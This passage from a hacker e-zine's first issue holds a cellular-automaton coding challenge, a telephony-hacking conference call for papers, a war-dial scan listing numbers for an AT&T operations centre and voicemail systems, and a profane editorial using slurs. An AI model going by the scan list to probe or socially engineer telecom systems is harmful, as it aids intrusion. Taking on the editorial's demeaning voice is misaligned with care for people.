each digit of the resulting number with its respective state. Take the following as example: Rule 90 decimal 90 = binary 01011010 By assigning each digit of the binary number to a state, starting from the least significant bit, we achieve: 000 = 0 001 = 1 010 = 0 011 = 1 100 = 1 101 = 0 110 = 1 111 = 0 Example output of an elementary cellular automaton generated using rule 90 over 16 generations is: x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x Building from the information provided, your task is to continue researching elementary cellular automata and write a program that generates a cellular automaton based upon user input of both rule number and number of generations. However, the output of this system cannot be ASCII or ASCII-like, as shown above. Examples of acceptable solutions include dynamically rendering the system as an image file or as a series of HTML tags that render the system in a web browser. Be creative. :) Solutions may be written in any programming or scripting language. Correct, acceptable, and innovative solutions will be published in the next issue of GNY Zine, and their authors will be recognized. Solutions may be submitted by: - Forum (http://gonullyourself.org/board/) - IRC (irc.distrust.us #gny) - Email (zine@gonullyourself.org) Excellent resources for further information on cellular automata: http://mathworld.wolfram.com/ElementaryCellularAutomaton.html http://mathworld.wolfram.com/CellularAutomaton.html http://en.wikipedia.org/wiki/Elementary_cellular_automaton http://en.wikipedia.org/wiki/Cellular_automaton [====================================================================================] -=[ ConfCon 2010 Call for Papers ]=- [ Author: PhreakerD7 ] Email: phreakerd7@antilimit.net Website: http://www.antilimit.net/ What is it? ConfCon is a one-of-a-kind conference call which takes place once a year. We have many talks on a wide variety of telephony-related subjects from numerous people in the scene. In 2009, we had people like Jason Scott (of textfiles.com), df99 (of ProjectMF), Lucky225, Royal, ThoughtPhreaker, RijilV and many more. It was a day of fun, lots of learning, and lots of cool experiences. Who runs it? ConfCon is a project run by AntiLimit. At its core, ConfCon was founded by PhreakerD7 and ThoughtPhreaker with lots of help from everyone in the scene (namely, Jason Scott, RijilV, Royal, BitRobber, and df99). Without these people (and many more!!), ConfCon would never have happened. In a sense, ConfCon is run completely by the people, for the people. How can I help? Well, based on what was previously said, we need PAPERS! We need submissions on anything telephony related!! If you've just done some cool VoIP hax (Asterisk, FreeSwitch, any of that), or if you've just pwned a PBX, or you've scanned some exchanges and found some interesting numbers, we WANT YOU! Maybe you've got some good SEing tips, some cool tricks for getting around phone things, or just maybe abusing the latest and greatest phone invention? If you're into hacking phones and mobile devices... LET US KNOW! Anything and everything related to telephony is something we're interested in. All information for submitting papers can be found on: http://ConfCon.org . Please submit something! Without you, ConfCon is nothing.. What are the details on ConfCon 2010? It's currently scheduled to take place on July 24th (the weekend after HOPE, and the weekend before Defcon) around 3PM PDT (4PM MDT, 5PM CDT, 6PM EDT). If you'd like to participate in the conference (FREE OF CHARGE!!), simply visit the ConfCon.org website, sign up there, and receive your conference number. All you have to do is dial-in, and enjoy! :) [====================================================================================] -=[ 907-887-88xx Scan ]=- [ Author: storm ] Email: storm@gonullyourself.org Website: http://gonullyourself.org/ I decided to scan the following range after finding an AT&T Network Operations Center (NOC) on 907-887-8888. The only other number that seems to really stick out is 907-887-8889, which ThoughtPhreaker and I identified as possibly being a Nortel CallPilot system. 907-887-8880 would seem uninteresting elsewhere, but it also does stick out somewhat amongst a sea of Audix boxes. 907-887-8800 - reorder 907-887-8801 - ring out to "It is not necessary to dial a 1..." 907-887-8802 - Audix 907-887-8803 - reorder 907-887-8804 - reoder 907-887-8805 - Audix 907-887-8806 - Audix 907-887-8807 - Audix 907-887-8808 - Audix 907-887-8809 - Audix 907-887-8810 - Audix 907-887-8811 - Audix 907-887-8812 - Audix 907-887-8813 - Audix 907-887-8814 - Audix 907-887-8815 - Audix 907-887-8816 - reorder 907-887-8817 - reorder 907-887-8818 - Audix 907-887-8819 - reorder 907-887-8820 - Audix 907-887-8821 - Audix 907-887-8822 - Audix 907-887-8823 - Audix 907-887-8824 - Audix 907-887-8825 - Audix 907-887-8826 - Audix 907-887-8827 - Audix 907-887-8828 - YCDNGT (092T) 907-887-8829 - reorder 907-887-8830 - Audix 907-887-8831 - reorder 907-887-8832 - reorder 907-887-8833 - reorder 907-887-8834 - reorder 907-887-8835 - reorder 907-887-8836 - reorder 907-887-8837 - YCDNGT (003T) 907-887-8838 - reorder 907-887-8839 - reorder 907-887-8840 - YCDNGT (092T) 907-887-8841 - reorder 907-887-8842 - Audix 907-887-8843 - Audix 907-887-8844 - Audix 907-887-8845 - Audix 907-887-8846 - Audix 907-887-8847 - Audix 907-887-8848 - Audix 907-887-8849 - Audix 907-887-8850 - Audix 907-887-8851 - Audix 907-887-8852 - Audix 907-887-8853 - Audix 907-887-8854 - Audix 907-887-8855 - Audix 907-887-8856 - Audix 907-887-8857 - Audix 907-887-8858 - Audix 907-887-8859 - Audix 907-887-8860 - Audix 907-887-8861 - Audix 907-887-8862 - Audix 907-887-8863 - Audix 907-887-8864 - Audix 907-887-8865 - Audix 907-887-8866 - Audix 907-887-8867 - Audix 907-887-8868 - Audix 907-887-8869 - Audix 907-887-8870 - Audix 907-887-8871 - Audix 907-887-8872 - Audix 907-887-8873 - Audix 907-887-8874 - Audix 907-887-8875 - Audix 907-887-8876 - Audix 907-887-8877 - Audix 907-887-8878 - Audix 907-887-8879 - Audix 907-887-8880 - VMS 907-887-8881 - Audix 907-887-8882 - Audix 907-887-8883 - Audix 907-887-8884 - Audix 907-887-8885 - Audix 907-887-8886 - Audix 907-887-8887 - Audix 907-887-8888 - AT&T NOC 907-887-8889 - "voice item maintenance" 907-887-8890 - Audix 907-887-8891 - Audix 907-887-8892 - Audix 907-887-8893 - Audix 907-887-8894 - Audix 907-887-8895 - Audix 907-887-8896 - Audix 907-887-8897 - Audix 907-887-8898 - Audix 907-887-8899 - Audix [====================================================================================] -=[ Et Cetera, Etc ]=- [ Author: teh crew ] Let's get things straight. The word "hacker" is not a name that should be treated or given lightly. The concept of hacking has been bastardized so severely over the years that it's near impossible to even find a kid in this shitpile of a "scene" who knows the true definition. No longer are learning or exploration at the forefront of one's mind. Priorities have been shuffled. Individuals are now judged based upon how many boxes they have rooted, how large of a DDoS they can push, or how quickly they can pull personal information on others. Curiosity has been replaced with egotism, and the true meaning of hacking has been lost in the process. We like to call these individuals "script kiddies" - the cancer of the hacking scene. These half-retarded morons are everywhere, flaunting their e-dicks as proudly as possible, just begging for attention. Everyone is suddenly an expert, and every 14-year-old now claims to be the elitest fucker on the Internet. Closing their minds to everything that is unimportant in their quest to command respect from other morons, script kiddies have a single goal: to climb the digital social ladder as quickly as possible. Humility is a rare occurrence in an environment saturated with such cluelessness and ignorance. Logic that associates behavior like this with the true meaning of hacking is about as fucked up as your mother is a sleazy crackwhore. Hacking is about a love for technology and an unquenchable thirst for analyzing, breaking, and rebuilding it. Hackers are driven by passion, not by personal gain. It's about time for this new generation to realize that. Such a mindset may open doors and present entirely new opportunities for hackers to experience technology and learn in the process. There is more to hacking than simply web-based exploits and buffer overflows. Take some time to learn about reverse engineering and how binaries are actually executed by the machine. Assembly programming is a powerful skill. Pick up your telephone - have you ever thought about how your calls are actually routed from origin to termination? The PSTN (Public Switched Telephone Network) is the largest and most robust human network in the world, second only to the Internet itself. Radio junkies have been owning the airwaves and innovating new methods of efficient wireless transmission for almost a century, giving birth to the hacker community and culture itself. A boring summer may be replaced with becoming licensed as a ham radio operator. Passion is not something that can be taught by a teacher or an essay - it must be realized, and once it is realized, it must be embraced. Embrace it by any means necessary. Research new technologies and play around with them in unconventional manners. Learn new concepts and expand your interests by reading online publications such as Phrack or venturing to Borders and picking up a copy of 2600. Meet other hackers and exchange knowledge and experiences by attending conferences or local meet-ups (or start your own!). And most importantly, have fun while doing it. Hopefully, such a mindset is adopted by more in this new generation of hackers. For those who have completely missed the ball, however, we can only hope that this little rant has sparked a change. With the recent disintegration of many prominent script kiddies communities within just the past few years, perhaps we're onto something. THE TREE OF FALLEN SKIDS ------------------------ Let us pay our respects, or something. .. ............ ...........7DNMM7?NOD?,7O?.,.,...,......:,........... ... . ...... ........,...+NDNO?D+7?I=?I?7$Z=++......,=.~8ONZ~D+,..,..... ... .... .............ON=I$?++?I???+=??+??++?M~,$ZD~OO=+?=?7OMI?ZZ... ... ............,Z??++?+=+==++?+I++?++???+7N=I7++I=O?Z$I++??78.,... ... . , .......=M+??+========++????+???+=7$+=~==+=+??+$???+I7+=..,...... .. ... ....:.+=8+~+M87+++~++????++??+OZ7$?I?$+++=+++=+++??++???++?I?+O,.......... .......:ZD=87=~O7=NI++++???++??+??I???=?$?+87I???+?+??++????+++=+==?==.......... ......~++?I?+==+?+?+=+??????????+??=?+?+?=$7??+?++??++??+?+?????+=I+O..,........ .....ID?++~~======+++++????????========+++I+OI??=77=O uNkn0wn ==+I$.,.,....... ....?$=+=~+++++++++++??????????++?++++===+????8I?Z?++?$$????????+=?78=...,...... ....:M7+=?++????????????????????????+??+=+=?+7$7II?++?+8??????+?+?=?++D....... ,...+M7~=??=???? h4cky0u ??????++??+??++~?+++Z77III??+???????+?=?++IZ...... ...,ID?+++??????????????????????????????==+I?++78I7?7777I?+?+?=???+?O~..... ....Z8I+??++????????????????????????????++?+??I87III??+=ZZZOZ$7?=?=?O...... ....=M$+????+++??????????? darkc0de ???????+?IZIODI?I+?++???D$Z+=O+. .... .....,M??++++++???????????????????????????+III7O+I?7$===+===+++??OM7~....... ......=7+$?????==I?=I++??++????+???????IIIII77II=+==++++++???+==+??=?......... ..... ..ZN$NI7+?+?DZ$=$7$7777+?+??++??II7ZZIII7?+?++++??I+I$77+++?+?N,....... .... ....+ND7M+?OI7Z?=?8III7777IIIII7$Z8OOIOON=7+?????+++?~+8OZ+++=?8,,.. .. ... ...O8Z$+++I7I$77+INO?O8ZO$$II7ZO$I7$$OOOO8$=I????????==++7O+?++?+D$$,...... ......$I7?++?+?+?+?II?I$?DZ$+IZZO$7DZ$IOOZ$Z$Z8=???????+++??+++$I?+???7I+M+..... ....ON?=~=?++++?+?++II?7+O+?+I8ZZ7$Z7DIZZ7$$$O?I?????++?????+????+??+?7?+8O?... ...ONZ=+==????+????+?+?7I+O?+??OI$8IOZZ+$$$Z$$D7?+??? h4ck-y0u ?+??+7D??==N:.. ..++=?++??+?+$$$??+??+II?$=I$??II?+ZZI7I$7Z$$Z87I?++++?????+??????????7O+=++O8,. :8N7+==+??OOZI?II???+II77$I++$ZIZI?+I+++?7$Z$ZO$I?++??++??+?7?++I?+???8Z++?==I8. Z8==+=???+Z=?+++?I?+?7$7$DO8Z=??DI=+877$ZZZ$$78I??7II???+Z7I+I?+?++???D$7+=~7M~. DDI???????OI+ BHF =OO?8OZZ7$ZI+I??7I?OOZ787$II8O$I777?+I=~?ZI???I7?IIII++=??N~ O++I+O7+???8?+??????OZ7D$ZZ$7$O7O+I?++?O$?I8$$$I7ZOO8?II?I+=?8??+++$8IIII+==??N~ MZ+?7$+?+??Z$ZI+??I?II8+IO$7$OIZ$Z?II=ZD$?7Z8Z$7?O$8OIO?II??+Z+??++OZI77???++$D. N++?+7$??+?+?=++?+I7I?8OZ$I?OII$$7O++=I7II8$$8D$IO?7ZO777$IOI7???ZZ$7III?+==++M~ ?8M=+Z??????++???I78+8OZZ78Z?I7$ZZ8O+=???777$8?7++OZ$$O$~+=?~88Z8$7$DI7II?++?ID~ .:MI++7?++?++?+?I8$7Z8ZO8I7Z7?+88OZZI7?I?I787III+ZZZI$7?++++==+IZ$7OIIII++?++??N ...D~+7?I?+??=???DO88$$ZD?7?I$??OO?I7$???$?++??7I$77$OI+??$OO=+=+$8$I77I??++NNM= ...?Z$D++???I??+?=7+?+II7I?I7$8+??I7IZ?+?$?++7??7$$I7OOII++?+$7+?+?+OII7???IM~.. ......+DDM+?O+?$NO+++????+I?8OOD??II?$7+I+Z?$$7O888O8DO78OI+?Z????=I+7II+?+?.... . ...,.Z8DDN8DN+I??+?Z?IDO$$$O7I=?=Z????+?==$Z$7$7Z$ZZIIIO?++7?Z+++I???7?7.,.. ....,.......,??DID8$O8$$$77?O7$I??I+I~?+?+??Z$$$IO$O$8$8ZI?+?8+?8+?OID+:.... . .......,......,.ON8OI?$8O777I?=++=Z++?8?I$OO77II77ZZI7=I=?M?MMI:....... ... ........... ..,.....+$MZI$D7$7IO=Z+=?II?8$O+??I7DDZ+O$$DMD$+.., .. .. .. ........................~~8MZ7?IO?8?+III?III?=IN,....... , .... . ..... .. ..........88II7O?O++$I$III?D7........... ............ZN+?ZZ?$+?ZIOZI78,............ .............$N+I8$?I?IZI$O$OZ............ ..... ........$D+78$+?II7?777D:............ .. ........ .......OO?OZ7?II?I7$$87. . ......... ........ ......,N7?O$7I$II7$Z$O,................. ....... . .. .7D?78$IIZIII7$7+..................... ..... ... .... .NIIIZ7??ZI?I?8I8..................... . ....... . ........ O??I7OII?ZI?I?8IN~.....,.............. ....... ... ..... ...........Z?I7Z$?I?I$I7I$O$O... ........................... ....... ... ... . ...........$?77O$????$I8+?$7Z?......... ... ........... ....... ... .. . .......,.,+M$Z7ZI I+Z $=+Z$8:........ ... ........... . , ,............ ,,.,....:8ZIO$D+ ?=??7ON7............ ............. . , ,.............,, ...,,N+I$ID++I n0ths I?7$I?++?IO+......,.,. ., ... ..,... . , ,........... ..,. .:8Z+I$OZ$?=I? 7$7?Z?I??7??M.... ..,. ., ... ,..... . , ,............,...=OZ?I?7$8++=???I 7$8I77ZII?I?I7+O~,..... ... , . , .... ............,..,.,..:NZI=?=?787=?+?I???I++?IO7$$7ZI??I+IIN,....,. ............. ....... ...,...:78$?I?I?II$7$+I?I7$OOI7?=??IZDDNN7$$II?I7.,..,....,............ .... . .....=8OI+I+I$ONNDOID+II??NNNDZ77Z$I++II8$,=ZN?I?+8?~.. . . .......... . . .. .N8ONN87=,......:MII7ID+...=$MOZ7$ZZ????N=.DN7?+?+$ODO. .. . .. ... ..............,ODII??D7.........:,..$M8??7Z..+78ZI~~~: . . .............D+I8NNO...............,..,+ON.,... .. ... ...........,?8D~,... .,... |\ _,,,---,,_ 0 it's a kitty! /.`.-'`' -. ;-;;,_ + |.3- ) )-,_..;\ ( `'-' '---''(_/--' `-'\_) Thanks to ElectRo` for that lovely ASCII art. Anyways, it's probably about time we wrapped this up. So, this is the end of GNY Zine, Issue #1. Hope you enjoyed it, and if you want to drop us a line, our contact information is in the intro. May your hax be plentiful and full of fish. <3, the gny crew [====================================================================================]